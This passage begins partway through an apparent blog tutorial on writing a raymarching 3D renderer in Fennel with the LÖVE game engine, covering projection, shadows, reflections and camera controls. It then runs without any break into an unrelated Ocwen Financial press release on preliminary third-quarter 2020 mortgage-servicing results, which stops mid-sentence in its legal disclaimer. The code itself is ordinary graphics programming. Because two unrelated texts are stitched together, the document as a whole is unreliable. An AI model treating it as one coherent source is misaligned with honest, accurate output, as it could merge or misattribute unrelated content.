We’ll also define some functions in the love namespace table (I’m not sure what it’s properly called in Lua, since it’s a table that acts like a namespace) – love.load, love.draw, and others along the way.

Let’s begin by initializing our window:

(local window-width 512)
(local window-height 448)
(local window-flags {:resizable true :vsync false :minwidth 256 :minheight 224})

(fn love.load []
  (love.window.setTitle "LÖVE Raymarching")
  (love.window.setMode window-width window-height window-flags))

This will set our window’s default width and height to 512 by 448 pixels, and its minimum width and height to 256 by 224 pixels respectively.
We also add the title "LÖVE Raymarching" to our window, though this is entirely optional.

Now we can write the love.draw function, which will shoot 1 ray per pixel and draw that pixel with the appropriate color.
However, we need a way of specifying the direction in which to shoot each ray.
To define the direction we will first need a projection plane and a lookat point.

Let’s create a lookat point as a simple zero vector [0 0 0] for now:

(local lookat [0 0 0])

Now we need to understand how to define our projection plane.
In our case, the projection plane is the plane of our screen, and our camera sits some distance away from it.
We also want to be able to change our field of view, or FOV for short, so we need a way of computing the distance to the projection plane, since the closer we are to the projection plane, the wider our field of view:

We can easily compute the distance if we have an angle, which we can also define as a var:

Now we can compute our projection distance (PD) by using this formula:

PD = 1 / tan(fov / 2)

Where fov is in radians.
And to compute radians we’ll need this constant:

(local RAD (/ math.pi 180.0))

Now we can transform any angle into radians by multiplying it by this value.
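For example (outputs approximate):

```fennel
(* 90 RAD)  ;; => ~1.5708 (pi/2)
(* 180 RAD) ;; => ~3.1416 (pi)
```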

At this point we know the distance to our projection plane, but we don’t know its size and position.
First, we need a ray origin (RO), and we already have it as our camera, so our ro will be equal to the current value of camera.pos.
Next, we need a look-at point, and we have it as the lookat variable, which is set to [0 0 0].
Now we can define a direction vector that will specify our forward direction:

F = norm(lookat - RO)

And with this vector F, if we move our ray origin by the distance we computed previously, we’ll arrive at the center of our projection plane, which we can call C:

C = RO + F * PD

The last thing we need to know, in order to get our orientation in space, is where up and right are.
We can compute this by specifying an upward vector and taking the cross product of it and our forward vector, thus producing a vector that is perpendicular to both of these vectors and points to the right.
To do this we need an up vector, which we define like this: [0 0 -1].
You may wonder why it is defined with the z axis negative, but this is done so positive z values actually go up as we look from the camera, and right is to the right.
We then compute the right vector as follows:

R = norm([0 0 -1] × F)

And the up vector U is the cross product of F and R. Let’s write this down in love.draw:

(fn love.draw []
  (let [(width height) (love-dimensions)
        projection-distance (/ 1 (tan (* (/ fov 2) RAD)))
        ro camera.pos
        f (norm (vec-sub lookat ro))
        c (vec-add ro (vec-mul f (vec3 projection-distance)))
        r (norm (cross [0 0 -1] f))
        u (cross f r)]
    nil)) ;; TBD

Currently we only compute these values but do not use them, hence the nil at the end of the let.
But now that we know where our projection plane is, and where right and up are, we can compute the intersection point on the plane at given x and y coordinates in unit-vector terms, thus defining a direction vector.

So, for each x from 0 to width and each y from 0 to height we will compute uv-x and uv-y coordinates, and find the direction vector rd.
To find uv-x we divide the current x by width, subtract 0.5, and multiply the result by the aspect ratio width/height.
For uv-y we only need to divide the current y by height and subtract 0.5:

(for [y 0 height]
  (for [x 0 width]
    (let [uv-x (* (- (/ x width) 0.5) (/ width height))
          uv-y (- (/ y height) 0.5)]
      nil))) ;; TBD

Now that we have uv-x and uv-y, we can compute the intersection point i, using the up and right vectors and the center of the plane:

I = C + R * uv-x + U * uv-y

And finally compute our direction vector RD:

RD = norm(I - RO)

And now we can use our march-ray procedure to compute distance and color of the pixel.
Let’s wrap everything up:

(local tan math.tan)
(fn love.draw []
  (let [projection-distance (/ 1 (tan (* (/ fov 2) RAD)))
        ro camera.pos
        f (norm (vec-sub lookat ro))
        c (vec-add ro (vec-mul f (vec3 projection-distance)))
        r (norm (cross [0 0 -1] f))
        u (cross f r)
        (width height) (love-dimensions)]
    (for [y 0 height]
      (for [x 0 width]
        (let [uv-x (* (- (/ x width) 0.5) (/ width height))
              uv-y (- (/ y height) 0.5)
              i (vec-add c (vec-add
                            (vec-mul r (vec3 uv-x))
                            (vec-mul u (vec3 uv-y))))
              rd (norm (vec-sub i ro))
              (distance color) (march-ray ro rd scene)]
          (if (< distance DRAW-DISTANCE)
              (love-set-color color)
              (love-set-color 0 0 0))
          (love-points x y))))))

Now, if we set the scene to contain a default sphere, and place our camera at [20 0 0], we should see this:

Which is correct, because our default sphere has white as the default color.

You can notice that we compute distance and color by calling (march-ray ro rd scene), and then check if the distance is less than DRAW-DISTANCE.
If it is, we set the pixel’s color to the color found by the march-ray function; otherwise we set it to black.
Lastly, we draw the pixel to the screen and repeat the whole process for the next intersection point, and thus the next pixel.

But we don’t have to draw plain black pixels if we didn’t hit anything!
Remember, in the beginning I wrote that if we pass close by an object, we do many steps – we can use this data to render a glow.
So if we modify the love.draw function a bit, we will be able to see the glow around our sphere.
And the closer the ray got to the sphere, the stronger the glow will be:

;; rest of love.draw
(let [ ;; rest of love.draw
      (distance color steps) (march-ray ro rd scene)]
  (if (< distance DRAW-DISTANCE)
    (love-set-color color)
    (love-set-color (vec3 (/ steps 100))))
  (love-points x y))
;; rest of love.draw

Here I’m setting the color to the number of steps divided by 100, which results in this glow effect:

Similarly to this glow effect, we can create fake ambient occlusion – the more steps we did before hitting the surface, the more complex it is, hence the less ambient light should be able to reach it.
Unfortunately, the only object we have at this moment is a sphere, so there’s no way to show this trick on it, as its surface isn’t very complex.

All this may seem expensive, and it actually is.
Unfortunately, Lua doesn’t have real multithreading to speed this up, and the threads feature provided by LÖVE resulted in even worse performance than computing everything in a single thread – at least the way I tried it.
There’s a shader DSL in LÖVE, which could be used to compute this stuff on the GPU, but that is currently out of the scope of this project, as I wanted to implement everything in Fennel.

Speaking of shaders: now that we can draw pixels on screen, we can also shade them, and compute lighting and reflections!

Lighting and reflections

Before we begin implementing lighting, let’s add two more objects – a ground plane and an arbitrary box.
Much like the sphere object, we first define a signed distance function, and then the constructor for the object:

(local abs math.abs)

(fn box-distance [{:pos [box-x box-y box-z]
                   :dimensions [x-side y-side z-side]}
                  [x y z]]
  (sqrt (+ (^ (max 0 (- (abs (- box-x x)) (/ x-side 2))) 2)
           (^ (max 0 (- (abs (- box-y y)) (/ y-side 2))) 2)
           (^ (max 0 (- (abs (- box-z z)) (/ z-side 2))) 2))))

(fn box [sides pos color]
  (let [[x y z] (or pos [0 0 0])
        [x-side y-side z-side] (or sides [10 10 10])
        [r g b] (or color [1 1 1])]
    {:dimensions [(or x-side 10)
                  (or y-side 10)
                  (or z-side 10)]
     :pos [(or x 0) (or y 0) (or z 0)]
     :color [(or r 0) (or g 0) (or b 0)]
     :sdf box-distance}))

(fn ground-plane [z color]
  (let [[r g b] (or color [1 1 1])]
    {:z (or z 0)
     :color [(or r 0) (or g 0) (or b 0)]
     :sdf (fn [plane [_ _ z]] (- z plane.z))}))

In the case of ground-plane we define :sdf as an anonymous function, because it is a simple one-liner.

Now that we have more objects, let’s add them to the scene and see if they work:

(var camera {:pos [20.0 50.0 0.0]
             :x-rotate 0.0
             :z-rotate 0.0})

(local scene [(sphere nil [-6 0 0] [1 0 0])
              (box nil [6 0 0] [0 1 0])
              (ground-plane -10 [0 0 1])])

With this scene and camera we should see this:

It’s a bit harsh on the eyes, but we can at least be sure that everything works correctly.
Now we can implement lighting.

In order to calculate lighting, we’ll need the normal to the surface at a given point.
Let’s create a get-normal function that receives a point and our scene:

(fn get-normal [[px py pz] scene]
  (let [x MARCH-DELTA
        (d) (distance-estimator [px py pz] scene)
        (dx) (distance-estimator [(- px x) py pz] scene)
        (dy) (distance-estimator [px (- py x) pz] scene)
        (dz) (distance-estimator [px py (- pz x)] scene)]
    (norm [(- d dx) (- d dy) (- d dz)])))

It’s a nice trick: we create three more points, each slightly offset from our original point along one axis, reuse the existing distance estimation function, and then normalize the vector built from the differences between the distance at the original point and the distances at the offset points.
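As a quick sanity check (a hypothetical REPL session, assuming the default sphere centered at the origin): for a point on the positive x axis, the normal should point along x:

```fennel
>> (get-normal [10 0 0] [(sphere)])
;; => approximately [1 0 0]
```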
Let’s use this function to get the normal at each point, and use the normal as our color:

;; rest of love.draw
(if (< distance DRAW-DISTANCE)
    (love-set-color (get-normal (move-point ro rd distance) scene))
    (love-set-color 0 0 0))
;; rest of love.draw

Notice that in order to get the endpoint of our ray, we move-point ro along the direction rd by the computed distance.
We then pass the resulting point and our scene into get-normal, thus computing the normal vector, which we then pass to love-set-color, and it gives us this result:

You can see that the ground-plane remained blue, and this isn’t an error. Blue in our case is [0 0 1], and since in our world positive z coordinates point up, we can see this directly in the resulting color of the plane.
The tops of the cube and the sphere are also blue, and the front sides are green, which means that our normals are correct.

Now we can compute basic lighting.
For that we’ll need a light object:

Let’s create a shade-point function that will accept a point, the point’s color, a light position, and the scene:

(fn shade-point [point color light scene]
  (vec-mul color (vec3 (point-lightness point scene light))))

It may seem that this function’s only purpose is to call point-lightness, which we will define a bit later, and return a new color.
And this is true, at least for now.
Let’s create the point-lightness function:

(fn clamp [a l t]
  (if (< a l) l
      (> a t) t
      a))

(fn above-surface-point [point normal]
  (vec-add point (vec-mul normal (vec3 (* MARCH-DELTA 2)))))

(fn point-lightness [point scene light]
  (let [normal (get-normal point scene) ➊
        light-vec (norm (vec-sub light point))
        (distance) (march-ray (above-surface-point point normal) ➋
                              light-vec
                              scene)
        lightness (clamp (dot light-vec normal) 0 1)] ➌
    (if (< distance DRAW-DISTANCE)
        (* lightness 0.5)
        lightness)))

What this function does is simple.
We compute the normal ➊ for the given point, then we find a point that is just above the surface, using the above-surface-point function ➋.
We use this point as our new ray origin and march towards the light.
We then take the distance returned by the march-ray function, and check whether we went all the way to the maximum distance or not.
If not, this means that there was a hit, and we halve the total lightness, thus creating a shadow.
Otherwise, we return the lightness as is.
And lightness is the dot product of light-vec and the normal to the surface ➌, where light-vec is a normalized vector from the point to the light.
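To build some intuition for the lightness term alone, here’s a quick check using the dot, norm, and clamp helpers from above, with [0 0 1] standing in for the surface normal of the ground plane (values are approximate):

```fennel
(clamp (dot (norm [0 0 1]) [0 0 1]) 0 1)  ;; light overhead   => 1
(clamp (dot (norm [1 0 1]) [0 0 1]) 0 1)  ;; light at 45 deg  => ~0.707
(clamp (dot (norm [0 0 -1]) [0 0 1]) 0 1) ;; light from below => 0
```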

If we again modify our love.draw function like this:

;; rest of love.draw
(if (< distance DRAW-DISTANCE)
    (let [point (move-point ro rd distance)]
      (love-set-color (shade-point point color scene light)))
    (love-set-color 0 0 0))
;; rest of love.draw

We should see the shadows:

This already looks like real 3D, and it is.
But we can do a bit more, so let’s add reflections.

Let’s create a reflection-color function:

(var reflection-count 3)

(fn reflection-color [color point direction scene light]
  (var [color p d i n] [color point direction 0 (get-normal point scene)]) ➊
  (var not-done? true)
  (while (and (< i reflection-count) not-done?)
    (let [r (vec-sub d (vec-mul (vec-mul (vec3 (dot d n)) n) [2 2 2])) ➋
          (distance new-color) (march-ray (above-surface-point p n) r scene)] ➌
      (if (< distance DRAW-DISTANCE)
          (do (set p (move-point p r distance))
              (set n (get-normal p scene))
              (set d r) ➍
              (let [[r0 g0 b0] color
                    [r1 g1 b1] new-color
                    l (/ (point-lightness p scene light) 2)]
                (set color [(* (+ r0 (* r1 l)) 0.66)
                            (* (+ g0 (* g1 l)) 0.66)
                            (* (+ b0 (* b1 l)) 0.66)]) ➎))
          (set not-done? false) ➏))
    (set i (+ i 1)) ➐)
  color)

This is quite a big function, so let’s look at it piece by piece.

First, we use destructuring to define several vars ➊ that we will later be able to change using set.
Next we enter a while loop, which checks both that the maximum number of reflections hasn’t been reached and that the ray hasn’t gone off to infinity.
The first thing we do in the loop is compute the reflection vector r ➋, using this formula:

r = d - 2 * (d . n) * n

This is our new direction, which we will march from a new above-surface-point ➌.
If we hit something, and our distance is less than DRAW-DISTANCE, we set our point p to the new point, compute the new normal n, and set the direction d to the previous direction, which was the reflection vector r ➍.
Next we compute the resulting color.
I’m doing simple color addition here, which is not the entirely correct way of doing it, but for now I’m fine with that.
We also compute the lightness of the reflection point and divide it by 2, so our reflections appear slightly darker.
Then we add each channel and make sure the result is not greater than 1, by multiplying it by 0.66 ➎.
The trick here is that the maximum reflection lightness we can get is 0.5, so if we add two values, one of which is multiplied by 0.5, the overall result can be brought back into range by multiplying by 0.66.
This way we’re not losing brightness, and the reflection color blends with the original color nicely.
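A quick check of the worst case, where both channels are at full brightness and the reflection lightness is at its maximum of 0.5:

```fennel
(* (+ 1 (* 1 0.5)) 0.66) ;; => 0.99, still below 1
```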

If we don’t hit anything, it means that this was the final reflection, so we can end ➏ the while loop on this iteration.
Lastly, since I’ve already ranted about the absence of break in Fennel, we have to increase the loop counter manually ➐ at the end of the loop.

Let’s change shade-point so it passes the color into this function:

(fn shade-point [point color direction scene light]
  (-> color
      (vec-mul (vec3 (point-lightness point scene light)))
      (reflection-color point direction scene light)))

You can notice that I’ve added a direction parameter, as we need it for computing reflections, so we also have to change the call to shade-point in the love.draw function:

;; rest of love.draw
(if (< distance DRAW-DISTANCE)
    (let [point (move-point ro rd distance)]
      (love-set-color (shade-point point color rd scene light))) ;; rd is our initial direction
    (love-set-color 0 0 0))
;; rest of love.draw

Let’s try this out (I’ve brought the ground-plane a bit closer to the objects so we can better see the reflections):

We can see reflections, and reflections of reflections in reflections, because we previously set reflection-count to 3.
Currently our reflections are pure mirrors, as we reflect everything at a perfect angle, and reflected shapes appear just like real objects.
This could be changed by introducing materials with qualities like roughness, and by using a better shading algorithm, such as Phong shading – but maybe next time.
Refractions also kind of need materials, as the refraction angle differs depending on the kind of material the ray goes through – e.g. glass and a still pool of water should have different refraction angles.
And some surfaces should reflect rays at certain angles and let them pass through at others, which would also require certain modifications to the reflection algorithm.

Now, if we set our lookat point, camera, and scene to:

(local lookat [19.75 49 19.74])

(var camera {:pos [20 50 20]
             :x-rotate 0
             :z-rotate 0})

(local scene [(box [5 5 5] [-2.7 -2 2.5] [0.79 0.69 0.59])
              (box [5 5 5] [2.7 2 2.5] [0.75 0.08 0.66])
              (box [5 5 5] [0 0 7.5] [0.33 0.73 0.42])
              (sphere 2.5 [-2.7 2.5 2.5] [0.56 0.11 0.05])
              (sphere 10 [6 -20 10] [0.97 0.71 0.17])
              (ground-plane 0 [0.97 0.27 0.35])])

We would see an image from the beginning of this post:

For now, I’m pretty happy with the current result, so lastly let’s make it possible to move around our 3D space.

User input

We’ll be implementing two different ways of moving around the scene – with keyboard and with gamepad.
The difference is mostly that a gamepad can give us floating-point values, so we can move slower or faster depending on how far we push the analog sticks.

We’ve already specified the needed functions from LÖVE as locals, but to recap, we’ll need only two:

(local love-key-pressed? love.keyboard.isDown)
(local love-get-joysticks love.joystick.getJoysticks)

But first, we’ll need to make changes to our camera, as currently it can only look at the origin.

How will we compute the look-at point for our camera so that we can move it around in a meaningful way?
I’ve decided that a good way is to “move” the camera forward a certain amount, and then rotate the resulting point around the camera using some angles.
Luckily for us, we’ve already specified that our camera has two angles, :x-rotate and :z-rotate:

(var camera {:pos [20 50 20]
             :x-rotate 255
             :z-rotate 15})

It is also declared as a var, which means that we can set new values into it.
Let’s write a function that computes a new lookat point for the current camera position and rotation:

(local cos math.cos)
(local sin math.sin)

(fn rotate-point [[x y z] [ax ay az] x-angle z-angle]
  (let [x (- x ax)
        y (- y ay)
        z (- z az)
        x-angle (* x-angle RAD)
        z-angle (* z-angle RAD)
        cos-x (cos x-angle)
        sin-x (sin x-angle)
        cos-z (cos z-angle)
        sin-z (sin z-angle)]
    [(+ (* cos-x cos-z x) (* (- sin-x) y) (* cos-x sin-z z) ax)
     (+ (* sin-x cos-z x) (* cos-x y) (- (* sin-x sin-z z)) ay)
     (+ (* (- sin-z) x) (* cos-z z) az)]))

(fn forward-vec [camera]
  (let [pos camera.pos]
    (rotate-point (vec-add pos [1 0 0]) pos camera.x-rotate camera.z-rotate)))

The first function, rotate-point, rotates one point around another by two angles, given in degrees.
It is based on aircraft principal axes, but we only have two axes, since we don’t need to “roll” – hence we do slightly fewer computations here.

Next is the forward-vec function, which computes the current “forward” vector for the camera.
Forward in this case means the direction the camera is “facing”, which is based on the two angles we specify in the camera.
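For example, rotating the point [1 0 0] around the origin (outputs are approximate, since sin and cos of right angles are not exact in floating point):

```fennel
(rotate-point [1 0 0] [0 0 0] 90 0) ;; => ~[0 1 0]
(rotate-point [1 0 0] [0 0 0] 0 90) ;; => ~[0 0 -1]
```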

With this function we can implement basic movement and rotation functions for camera:

(fn camera-forward [n]
  (let [dir (norm (vec-sub (forward-vec camera) camera.pos))]
    (set camera.pos (move-point camera.pos dir n))))

(fn camera-elevate [n]
  (set camera.pos (vec-add camera.pos [0 0 n])))

(fn camera-rotate-x [x]
  (set camera.x-rotate (% (- camera.x-rotate x) 360)))

(fn camera-rotate-z [z]
  (set camera.z-rotate (clamp (+ camera.z-rotate z) -89.9 89.9)))

(fn camera-strafe [x]
  (let [z-rotate camera.z-rotate]
    (set camera.z-rotate 0)
    (camera-rotate-x 90)
    (camera-forward x)
    (camera-rotate-x -90)
    (set camera.z-rotate z-rotate)))

And if we modify our love.draw again, we’ll be able to use our computed lookat point as follows:

(fn love.draw []
  (let [;; rest of the bindings as before
        lookat (forward-vec camera)
        ;; rest of the bindings
        ]
    ;; rest of love.draw
    ))

Now we don’t need a global lookat variable; it is enough to compute a new lookat every frame.

As for movement, let’s implement a simple keyboard handler:

(fn handle-keyboard-input []
  (if (love-key-pressed? "w") (camera-forward 1)
      (love-key-pressed? "s") (camera-forward -1))
  (if (love-key-pressed? "d")
      (if (love-key-pressed? "lshift")
          (camera-strafe 1)
          (camera-rotate-x 1))
      (love-key-pressed? "a")
      (if (love-key-pressed? "lshift")
          (camera-strafe -1)
          (camera-rotate-x -1)))
  (if (love-key-pressed? "q") (camera-rotate-z 1)
      (love-key-pressed? "e") (camera-rotate-z -1))
  (if (love-key-pressed? "r") (camera-elevate 1)
      (love-key-pressed? "f") (camera-elevate -1)))

Similarly, we can implement controller support:

(fn handle-controller []
  (when gamepad
    (let [lstick-x  (gamepad:getGamepadAxis "leftx")
          lstick-y  (gamepad:getGamepadAxis "lefty")
          l2        (gamepad:getGamepadAxis "triggerleft")
          rstick-x  (gamepad:getGamepadAxis "rightx")
          rstick-y  (gamepad:getGamepadAxis "righty")
          r2        (gamepad:getGamepadAxis "triggerright")]
      (when (and lstick-y (or (< lstick-y -0.2) (> lstick-y 0.2)))
        (camera-forward (* 2 (- lstick-y))))
      (when (and lstick-x (or (< lstick-x -0.2) (> lstick-x 0.2)))
        (camera-strafe (* 2 lstick-x)))
      (when (and rstick-x (or (< rstick-x -0.2) (> rstick-x 0.2)))
        (camera-rotate-x (* 4 rstick-x)))
      (when (and rstick-y (or (< rstick-y -0.2) (> rstick-y 0.2)))
        (camera-rotate-z (* 4 rstick-y)))
      (when (and r2 (> r2 -0.8))
        (camera-elevate (+ 1 r2)))
      (when (and l2 (> l2 -0.8))
        (camera-elevate (- (+ 1 l2)))))))

The only controller-specific detail is that we shift the l2 and r2 trigger axes into the 0 to 2 range by adding 1, since by default these axes go from -1 to 1, which isn’t going to work for us.
In the same way we could add the ability to change the field of view or the reflection count, but I’ll leave that out for those who are interested in trying it themselves.
It’s not hard.
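
For instance, a field-of-view handler could look something like the sketch below. This is only an illustration: it assumes the field of view is kept in a top-level var named fov (a name not shown in this article), and it reuses the clamp helper from camera-rotate-z.

```fennel
;; hypothetical: assumes `fov` is declared elsewhere, e.g. (var fov 60)
(fn camera-fov [n]
  (set fov (clamp (+ fov n) 30 120)))
```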

As a final piece, we need to detect when a controller is connected, and to call our input handlers somewhere.
So let’s add the two final functions that we need for everything to work (note that in the actual file the (var gamepad nil) declaration has to appear above handle-controller, otherwise Fennel will complain about an unknown identifier):

(var gamepad nil)

(fn love.joystickadded [g]
  (set gamepad g))

(fn love.update [dt]
  (handle-keyboard-input)
  (handle-controller))

love.joystickadded takes care of watching for new controllers, and love.update polls for new input every frame.

At this point we should have a working raymarching 3D renderer with basic lighting and reflections!

Final thoughts

I’ve decided to write this post because I was interested in three topics:

  • Fennel, a Lisp-like language, which is a lot like Clojure syntax-wise, and has great interop with Lua (because it IS Lua),
  • LÖVE, a nice game engine I’ve been watching for a long time, having played some quite awesome games written with it,
  • and Lua itself, a nice, fast scripting language built around the cool idea that everything is a table.

Although I didn’t use much plain Lua here, I’ve actually tinkered with it a lot during the whole process, testing different things, reading Fennel’s compiler output, and benchmarking various constructs, like field access, or unpacking numeric tables versus multiple return values.
Lua has some really cool semantics, like defining modules as tables, and giving special meaning to tables via setmetatable, which is really easy to understand, in my opinion.

Fennel is a great choice if you don’t want to learn Lua syntax (which is small, but, you know, it exists).
For me, Fennel is a great language, because I don’t have to deal with Lua syntax AND because I can write macros.
And even though I didn’t write any macros for this project, because everything I needed is already provided by Fennel itself, the possibility of doing so is worth something.
Also, while benchmarking various features, I used a self-written time macro:

(macro time [body]
  `(let [clock# os.clock
         start# (clock#)
         res# ,body
         end# (clock#)]
     (print (.. "Elapsed: " (* 1000 (- end# start#)) " ms"))
     res#))

So the ability to define such things is a good thing.
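
For example, wrapping any expression in the macro prints its evaluation time and still returns the result (rotate-point here is just a stand-in for whatever you want to measure):

```fennel
;; prints something like "Elapsed: 0.01 ms" and binds the rotated point
(local rotated (time (rotate-point [1 0 0] [0 0 0] 90 0)))
```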

LÖVE is a great engine, and although I’ve used only a small part of it, I still think it is a really cool project, because there is so much more in it.
Maybe some day I’ll make a game that realizes LÖVE’s full potential.

On a downside note…
The resulting raymarcher is very slow.
I’ve managed to get around 25 FPS for a single object in the scene, at a 256 by 224 pixel resolution.
Yes, this is because it runs in a single thread, and does a lot of expensive computations.
Lua itself isn’t a very fast language, and even though LÖVE uses LuaJIT – a just-in-time compiler that emits machine code – it’s still not fast enough for certain operations or techniques.
For example, if we implemented operator overloading for our vectors, we would lose a lot of performance to constant metatable lookups.
This is an existing problem in Lua: it does its best to be small and embeddable, so it can run on nearly anything, and therefore it doesn’t do a lot of caching and optimization.
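
To illustrate, vector operator overloading would look something like the sketch below. This is not code from the renderer – it is exactly what the renderer avoids, because every overloaded + goes through a metatable lookup instead of a direct function call:

```fennel
;; a sketch of `+` overloading for 3-element vectors via setmetatable
(local vec-mt {})

(fn new-vec [x y z]
  (setmetatable [x y z] vec-mt))

(set vec-mt.__add
     (fn [[ax ay az] [bx by bz]]
       (new-vec (+ ax bx) (+ ay by) (+ az bz))))

;; now (+ (new-vec 1 2 3) (new-vec 4 5 6)) yields [5 7 9],
;; but pays for a metatable lookup on every addition
```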

But hey, this is a raymarcher in ~350 lines of code, with some cool tricks like destructuring!
I’m fine with the results.
A slightly more polished version of the code from this article is available at this repository, so if anything doesn’t work in the code above, or you got lost and just want to play with the final result, you know where to go 🙂

Till next time, and thanks for reading!


Business

Ocwen Financial Provides Business Update and Preliminary Third Quarter Results

becker blake


Continued profitability improvement and originations volume growth

Strong operating and financial momentum

Settlement with Florida completes resolution of all state actions from 2017

WEST PALM BEACH, Fla., Oct. 20, 2020 (GLOBE NEWSWIRE) — Ocwen Financial Corporation (NYSE: OCN) (“Ocwen” or the “Company”), a leading non-bank mortgage servicer and originator, today provided preliminary information regarding its third quarter 2020 results and progress on the Company’s key business priorities. A presentation with additional detail regarding today’s announcement is available on the Ocwen Financial Corporation website at www.ocwen.com (through a link on the Shareholder Relations page).

The Company reported a net loss of $9.4 million and a pre-tax loss of $11.4 million for the three months ended September 30, 2020, compared to a net loss of $42.8 million and a pre-tax loss of $38.3 million for the three months ended September 30, 2019. Adjusted pre-tax income was $13.5 million for the quarter compared to a $42.0 million adjusted pre-tax loss excluding NRZ lump-sum amortization in the prior year period (see “Note Regarding Non-GAAP Financial Measures” below).

Glen A. Messina, President and CEO of Ocwen, said, “Our performance across the business is progressing consistent with our expectations. The execution of our strategy to drive balance, diversification, cost leadership and operational excellence is delivering improved profitability, originations growth across all channels, and continued strong operating performance in our servicing business. Our total liquidity position has improved from last quarter and we are making good progress on our plans to implement an MSR asset vehicle to support our continued growth and diversification efforts.”

Mr. Messina continued, “I believe the Ocwen of today is stronger, more efficient, more diversified, and well positioned to capitalize on current and emerging growth opportunities. I am very proud of our global team for their continued commitment to our mission of creating positive outcomes for homeowners, communities and investors.”

The Company reported the following preliminary results for the third quarter 2020 (see “Note Regarding Non-GAAP Financial Measures” and “Note Regarding Financial Performance Estimates” below):

  • Pre-tax loss was $11.4 million compared to pre-tax loss of $38.3 million for the third quarter 2019. Adjusted pre-tax income was $13.5 million; fourth consecutive quarter of positive adjusted pre-tax income.
  • Annualized pre-tax loss improved by $208 million compared to the combined annualized pre-tax loss of Ocwen and PHH Corporation for the second quarter 2018; annualized adjusted pre-tax earnings run rate excluding amortization of NRZ lump-sum payments improved by more than $376 million compared to the combined annualized adjusted pre-tax earnings run rate of Ocwen and PHH Corporation for the second quarter 2018.
  • Notable items for the quarter include, among others, $13.8 million of re-engineering and COVID-19 related expenses, $5.8 million for legal and regulatory reserves and $4.4 million of MSR valuation adjustments.
  • Resolved legacy regulatory matter with the State of Florida Office of the Attorney General and Office of Financial Regulation on October 15, 2020. The Company has now resolved all state actions from 2017.
  • Approximately $6.7 billion of servicing UPB originated through forward and reverse lending channels, up 67% from prior quarter; average daily lock volume of approximately $145 million in October to date.
  • Added approximately $4.7 billion of interim subservicing UPB from existing subservicing clients and $15 billion of opportunities in late-stage discussions. Strong pipeline with top 10 prospects representing approximately $125 billion in combined subservicing, flow and recapture services opportunities.
  • Approximately $413 million of unrestricted cash and available credit at September 30, 2020, up from $314 million at June 30, 2020; previously identified balance sheet optimization actions on track.
  • Continued progress on the implementation of MSR asset vehicle (“MAV”) and the Company is in advanced discussions with potential investors. MAV is expected to provide funding for up to $55 billion in synthetic subservicing and enable portfolio retention services.
  • Approximately 75,000 forbearance plans outstanding as of October 9, 2020, down from a peak of approximately 131,000 forbearance plans outstanding at the end of the second quarter. Servicer advance levels are approximately 27% below base case servicer advance levels as of September 30, 2020.

Webcast and Conference Call

Ocwen will hold a conference call on Tuesday, October 20, 2020 at 8:30 a.m. (ET) to review the Company’s preliminary third quarter 2020 operating results. A live audio webcast and slide presentation for the call will be available at www.ocwen.com (through a link on the Shareholder Relations page). A replay of the conference call will be available via the website approximately two hours after the conclusion of the call and will remain available for approximately 30 days. The Company expects to release final third quarter 2020 results in early November.

About Ocwen Financial Corporation

Ocwen Financial Corporation (NYSE: OCN) is a leading non-bank mortgage servicer and originator providing solutions through its primary brands, PHH Mortgage and Liberty Reverse Mortgage. PHH Mortgage is one of the largest servicers in the country, focused on delivering a variety of servicing and lending programs. Liberty is one of the nation’s largest reverse mortgage lenders dedicated to education and providing loans that help customers meet their personal and financial needs. We are headquartered in West Palm Beach, Florida, with offices in the United States and the U.S. Virgin Islands and operations in India and the Philippines, and have been serving our customers since 1988. For additional information, please visit our website (www.ocwen.com).

Forward-Looking Statements

This press release contains forward-looking statements within the meaning of Section 27A of the Securities Act of 1933, as amended, and Section 21E of the Securities Exchange Act of 1934, as amended. These forward-looking statements may be identified by a reference to a future period or by the use of forward-looking terminology. Forward-looking statements are typically identified by words such as “expect”, “believe”, “foresee”, “anticipate”, “intend”, “estimate”, “goal”, “strategy”, “plan” “target” and “project” or conditional verbs such as “will”, “may”, “should”, “could” or “would” or the negative of these terms, although not all forward-looking statements contain these words. Forward-looking statements by their nature address matters that are, to different degrees, uncertain. Our business has been undergoing substantial change and we are in the midst of a period of significant capital markets volatility and experiencing significant changes within the mortgage lending and servicing ecosystem which has magnified such uncertainties. Readers should bear these factors in mind when considering such statements and should not place undue reliance on such statements.

Forward-looking statements involve a number of assumptions, risks and uncertainties that could cause actual results to differ materially. In the past, actual results have differed from those suggested by forward looking statements and this may happen again. Important factors that could cause actual results to differ materially from those suggested by the forward-looking statements include, but are not limited to, uncertainty relating to the continuing impacts of the COVID-19 pandemic, including the response of the U.S. government, state governments, the Federal National Mortgage Association (Fannie Mae) and Federal Home Loan Mortgage Corporation (Freddie Mac) (together, the GSEs), the Government National Mortgage Association (Ginnie Mae) and regulators, as well as the potential for ongoing disruption in the financial markets and in commercial activity generally, increased unemployment, and other financial difficulties facing our borrowers; the proportion of borrowers who enter into forbearance plans, the financial ability of borrowers to resume repayment and their timing for doing so; the adequacy of our financial resources, including our sources of liquidity and ability to sell, fund and recover servicing advances, forward and reverse whole loans, and HECM and forward loan buyouts and put backs, as well as repay, renew and extend borrowings, borrow additional amounts as and when required, meet our MSR or other asset investment objectives and comply with our debt agreements, including the financial and other covenants contained in them; increased servicing costs based on increased borrower delinquency levels or other factors; our ability to consummate a transaction with investors to implement our planned mortgage asset vehicle, the timeline for making such a vehicle operational, including obtaining required regulatory approvals, and the extent to which such a vehicle will accomplish our objectives; the future of our long-term relationship and remaining servicing 
agreements with NRZ; our ability to timely adjust our cost structure and operations following the completion of the loan transfer process in response to the previously disclosed termination by NRZ of the PMC subservicing agreement; our ability to continue to improve our financial performance through cost re-engineering efforts and other actions; our ability to continue to grow our lending business and increase our lending volumes in a competitive market and uncertain interest rate environment; our ability to execute on identified business development and sales opportunities; uncertainty related to past, present or future claims, litigation, cease and desist orders and investigations regarding our servicing, foreclosure, modification, origination and other practices brought by government agencies and private parties, including state regulators, the Consumer Financial Protection Bureau (CFPB), State Attorneys General, the Securities and Exchange Commission (SEC), the Department of Justice or the Department of Housing and Urban Development (HUD); adverse effects on our business as a result of regulatory investigations, litigation, cease and desist orders or settlements and the reactions of key counterparties, including lenders, the GSEs and Ginnie Mae; our ability to comply with the terms of our settlements with regulatory agencies and the costs of doing so; increased regulatory scrutiny and media attention; any adverse developments in existing legal proceedings or the initiation of new legal proceedings; our ability to effectively manage our regulatory and contractual compliance obligations; our ability to interpret correctly and comply with liquidity, net worth and other financial and other requirements of regulators, the GSEs and Ginnie Mae, as well as those set forth in our debt and other agreements; our ability to comply with our servicing agreements, including our ability to comply with the requirements of the GSEs and Ginnie Mae and maintain our seller/servicer 
